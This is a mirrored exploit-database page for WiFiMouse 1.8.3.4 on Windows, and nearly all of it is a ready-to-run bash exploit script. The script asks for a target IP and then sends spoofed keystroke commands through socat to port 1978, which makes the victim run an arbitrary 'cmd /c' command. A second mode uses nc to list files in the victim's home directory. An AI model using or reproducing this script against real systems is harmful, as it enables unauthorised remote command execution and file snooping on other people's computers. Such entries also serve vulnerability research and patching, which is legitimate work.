WiFiMouse 1.8.3.4 – Remote Code Execution (RCE)

• Exploit Database
• 118 阅读

• 作者： FEBIN MON SAJI
  日期： 2022-09-21
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51016/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64

  # Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE) # Date: 15-08-2022 # Author: Febin # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: 1.8.3.4 # Tested on: Windows 10   #!/bin/bash printf " WiFiMouse / MouseServer 1.8.3.4 Exploit   by FEBIN   "   printf "[*] Enter the Target IP Address: " read TARGET       rce(){ printf "[*] Enter the Command to execute on the Target:" read CMD   sh -c "echo 'key9[R] WIN d';sleep 1;echo 'key9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978 }   dirlist(){   echo "[*] User's Home Directory Contents:"   echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2-   while $true do printf "\nList Directory:> " read DIR echo "[+] Contents of $DIR: " echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2- done     }   printf " [1] Remote Command Execution [2] Directory Listing " printf "Enter Your Choice (1 or 2) : " read CHOICE   if [[ $CHOICE == "1" ]] then rce elif [[ $CHOICE == "2" ]] then dirlist   else echo "[-] Invalid Choice!" fi